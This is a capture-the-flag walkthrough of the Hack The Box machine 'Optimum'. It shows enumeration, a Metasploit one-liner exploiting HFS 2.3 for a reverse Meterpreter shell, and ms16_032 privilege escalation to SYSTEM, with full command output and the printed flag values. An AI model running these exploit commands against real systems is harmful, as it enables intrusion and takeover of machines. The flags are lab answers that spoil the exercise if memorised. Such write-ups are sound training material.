Optimum
About
Optimum is a beginner-level machine which mainly focuses on enumeration of services with known exploits. Both exploits are easy to obtain and have associated Metasploit modules, making this machine fairly simple to complete.
Enumeration
Running the script portscan.sh reveals a single attack vectors, HTTP.
┌──(m0nk3y@kali)-[~/HTB/Optimum]
└─$ sudo portscan.sh 10.129.67.164
┌──(m0nk3y@kali)-[~/HTB/Optimum]
└─$ cat PortScan\(10.129.67.164\)
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Exploitation
HTTP
As nmap revealed the service HttpFileServer 2.3 running on target, I’ll look for a known exploit using searchsploit-prettify.py. Based on the result, there seems to be a remote code execution vulnerability which can be exploited using a Metasploit module Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit).
┌──(m0nk3y@kali)-[~/HTB/Optimum]
└─$ searchsploit-prettify.py 'HFS 2.3'
-------------------------------------------------------------------------- ---------------------------------------------------------
| Exploit Title | Path |
-------------------------------------------------------------------------- ---------------------------------------------------------
| HFS (HTTP File Server) 2.3.x - Remote Command Execution (3) | /usr/share/exploitdb/exploits/windows/remote/49584.py |
| HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) | /usr/share/exploitdb/exploits/multiple/remote/48569.py |
| Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit) | /usr/share/exploitdb/exploits/windows/remote/34926.rb |
| Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | /usr/share/exploitdb/exploits/multiple/remote/30850.txt |
| Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | /usr/share/exploitdb/exploits/windows/remote/34668.txt |
| Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | /usr/share/exploitdb/exploits/windows/remote/39161.py |
| Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | /usr/share/exploitdb/exploits/windows/webapps/34852.txt |
-------------------------------------------------------------------------- ---------------------------------------------------------
By executing the exploit, I’m able to gain a shell as the user OPTIMUM\kostas.
┌──(m0nk3y@kali)-[~/HTB/Optimum]
└─$ msfconsole -q -x 'use exploit/windows/http/rejetto_hfs_exec; set RHOSTS 10.129.67.164; set RPORT 80; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
RHOSTS => 10.129.67.164
RPORT => 80
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Using URL: http://10.10.16.9:8080/MC6KwmspE0pF
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /MC6KwmspE0pF
[*] Sending stage (175686 bytes) to 10.129.67.164
[!] Tried to delete %TEMP%\gRAYbK.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.67.164:49162) at 2023-09-07 08:08:08 -0400
[*] Server stopped.
meterpreter > getuid
Server username: OPTIMUM\kostas
Privilege Escalation
Checking the user group shows that the user OPTIMUM\kostas is not part of any privileged groups. It also shows that we are currently under a medium integrity context, which is to be expected for a normal user account.
C:\Windows\system32>whoami /groups
whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
In order to look for alternative vulnerabilities, I’ll be using the module post/multi/recon/local_exploit_suggester. However, for us to use the module, we first need to match the architecture of our context and the architecture of the operating system. Checking the system information reveals that the target’s operating system is x64 while we are using a x86 meterpreter shell.
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 3
Meterpreter : x86/windows
To solve this issue, I’ll migrate to the process explorer.exe which is running under x64 architecture.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
208 476 svchost.exe
228 4 smss.exe
264 544 WmiPrvSE.exe
332 320 csrss.exe
384 320 wininit.exe
392 376 csrss.exe
420 376 winlogon.exe
476 384 services.exe
484 384 lsass.exe
524 476 spoolsv.exe
544 476 svchost.exe
572 476 svchost.exe
636 476 VGAuthService.exe
660 420 dwm.exe
672 476 svchost.exe
708 476 svchost.exe
764 476 svchost.exe
832 476 svchost.exe
912 3028 tWBREMyZnAPrX.exe x86 1 OPTIMUM\kostas C:\Users\kostas\AppData\Local\Temp\radAE2E4.tmp\tWBREMyZnAPrX.exe
956 476 svchost.exe
1016 912 cmd.exe x86 1 OPTIMUM\kostas C:\Windows\SysWOW64\cmd.exe
1028 912 cmd.exe x86 1 OPTIMUM\kostas C:\Windows\SysWOW64\cmd.exe
1044 476 vmtoolsd.exe
1060 476 ManagementAgentHost.exe
1084 708 taskhostex.exe x64 1 OPTIMUM\kostas C:\Windows\System32\taskhostex.exe
1224 476 svchost.exe
1424 476 dllhost.exe
1528 1948 explorer.exe x64 1 OPTIMUM\kostas C:\Windows\explorer.exe
1596 1016 conhost.exe x64 1 OPTIMUM\kostas C:\Windows\System32\conhost.exe
1692 476 msdtc.exe
1720 544 WmiPrvSE.exe
2440 1528 vmtoolsd.exe x64 1 OPTIMUM\kostas C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2540 1028 conhost.exe x64 1 OPTIMUM\kostas C:\Windows\System32\conhost.exe
2568 1528 hfs.exe x86 1 OPTIMUM\kostas C:\Users\kostas\Desktop\hfs.exe
3028 2568 wscript.exe x86 1 OPTIMUM\kostas C:\Windows\SysWOW64\wscript.exe
meterpreter > migrate 1528
[*] Migrating from 912 to 1528...
[*] Migration completed successfully.
With the architecture now matched, I’ll run the module post/multi/recon/local_exploit_suggester. From the result, we can check that it revealed 9 potential exploits that can be used. However, out of those 9 exploits, exploits regarding the bypass of UAC will not be functional as the user OPTIMUM\kostas does not belong to the administrators’ group.
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.129.67.164 - Collecting local exploits for x64/windows...
[*] 10.129.67.164 - 186 exploit checks are being tried...
[+] 10.129.67.164 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.129.67.164 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.129.67.164 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.129.67.164 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.129.67.164 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 10.129.67.164 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
[+] 10.129.67.164 - exploit/windows/local/cve_2021_40449: The service is running, but could not be validated. Windows 8.1/Windows Server 2012 R2 build detected!
[+] 10.129.67.164 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.129.67.164 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 43 / 43
[*] 10.129.67.164 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
3 exploit/windows/local/bypassuac_sdclt Yes The target appears to be vulnerable.
4 exploit/windows/local/bypassuac_sluihijack Yes The target appears to be vulnerable.
5 exploit/windows/local/cve_2019_1458_wizardopium Yes The target appears to be vulnerable.
6 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
7 exploit/windows/local/cve_2021_40449 Yes The service is running, but could not be validated. Windows 8.1/Windows Server 2012 R2 build detected!
8 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
9 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
10 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
11 exploit/windows/local/always_install_elevated No The target is not exploitable.
12 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
13 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
14 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
15 exploit/windows/local/capcom_sys_exec No Cannot reliably check exploitability.
16 exploit/windows/local/cve_2020_0796_smbghost No The target is not exploitable.
17 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
18 exploit/windows/local/cve_2020_1054_drawiconex_lpe No The target is not exploitable. No target for win32k.sys version 6.3.9600.17393
19 exploit/windows/local/cve_2020_1313_system_orchestrator No The target is not exploitable.
20 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
21 exploit/windows/local/cve_2020_17136 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
22 exploit/windows/local/cve_2021_21551_dbutil_memmove No The target is not exploitable.
23 exploit/windows/local/cve_2022_21882_win32k No The target is not exploitable.
24 exploit/windows/local/cve_2022_21999_spoolfool_privesc No The target is not exploitable.
25 exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver No The target is not exploitable.
26 exploit/windows/local/cve_2023_21768_afd_lpe No The target is not exploitable. The exploit only supports Windows 11 22H2
27 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
28 exploit/windows/local/ikeext_service No The check raised an exception.
29 exploit/windows/local/lexmark_driver_privesc No The target is not exploitable. No Lexmark print drivers in the driver store
30 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows 2012 R2 (6.3 Build 9600). is not vulnerable
31 exploit/windows/local/ms14_058_track_popup_menu No The target is not exploitable.
32 exploit/windows/local/ms15_051_client_copy_image No The target is not exploitable.
33 exploit/windows/local/ms15_078_atmfd_bof No Cannot reliably check exploitability.
34 exploit/windows/local/ms16_014_wmi_recv_notif No The target is not exploitable.
35 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
36 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
37 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
38 exploit/windows/local/nvidia_nvsvc No The check raised an exception.
39 exploit/windows/local/panda_psevents No The target is not exploitable.
40 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
41 exploit/windows/local/srclient_dll_hijacking No The target is not exploitable. Target is not Windows Server 2012.
42 exploit/windows/local/virtual_box_opengl_escape No The target is not exploitable.
43 exploit/windows/local/webexec No The check raised an exception.
With a bit of brute-force, I’m able to use the module exploit/windows/local/ms16_032_secondary_logon_handle_privesc to gain a shell as the user NT AUTHORITY\SYSTEM.
meterpreter > run exploit/windows/local/ms16_032_secondary_logon_handle_privesc LHOST=10.10.16.9 LPORT=4444 TARGET='Windows x64'
[*] Started reverse TCP handler on 10.10.16.9:4444
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\qDINtEgPsp.ps1...
[*] Compressing script contents...
[+] Compressed size: 3739
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 1204
[*] Sniffing out privileged impersonation token..
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[!] NtImpersonateThread failed, exiting..
[+] Thread resumed!
[*] Sniffing out SYSTEM shell..
[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
lwqsiNw04yJAGLMS9cJvCXTn2hVJuH6T
[+] Executed on target machine.
[*] Sending stage (175686 bytes) to 10.129.67.164
[*] Meterpreter session 2 opened (10.10.16.9:4444 -> 10.129.67.164:49171) at 2023-09-07 08:25:03 -0400
[+] Deleted C:\Users\kostas\AppData\Local\Temp\qDINtEgPsp.ps1
[*] Session 2 created in the background.
meterpreter > sessions 2
[*] Backgrounding session 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Post Exploitation
With the shell acquired, I’m able to read the flags user.txt and root.txt.
meterpreter > cat 'C:\Users\kostas\Desktop\user.txt'
f6077fb551d577bb0cd0c4445f547dfe
meterpreter > cat 'C:\Users\Administrator\Desktop\root.txt'
5c9858e3ab9604f4cff6e99532216d4f